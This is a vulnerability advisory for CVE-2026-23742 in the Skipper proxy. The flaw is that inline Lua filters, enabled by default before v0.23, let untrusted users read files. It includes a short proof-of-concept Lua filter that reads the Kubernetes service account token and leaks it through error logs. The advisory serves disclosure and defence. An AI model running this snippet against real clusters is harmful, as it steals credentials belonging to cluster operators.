CVE-2026-23742: Skipper is vulnerable to arbitrary code execution through lua filters
Arbitrary code execution through lua filters.
The default skipper configuration before v0.23 was -lua-sources=inline,file.
The problem starts if untrusted users can create lua filters, because of -lua-sources=inline , for example through a Kubernetes Ingress resource. The configuration inline allows these user to create a script that is able to read the filesystem accessible to the skipper process and if the user has access to read the logs they an read skipper secrets.
Kubernetes example (vulnerability is not limited to Kubernetes)
function request(ctx, params)
local file = io.open('/var/run/secrets/kubernetes.io/serviceaccount/token', 'r')
if file then
local token = file:read('*all')
file:close()
error('[EXFIL] ' .. token) -- Exfiltrate via error logs
end
end
References
Code Behaviors & Features
Detect and mitigate CVE-2026-23742 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →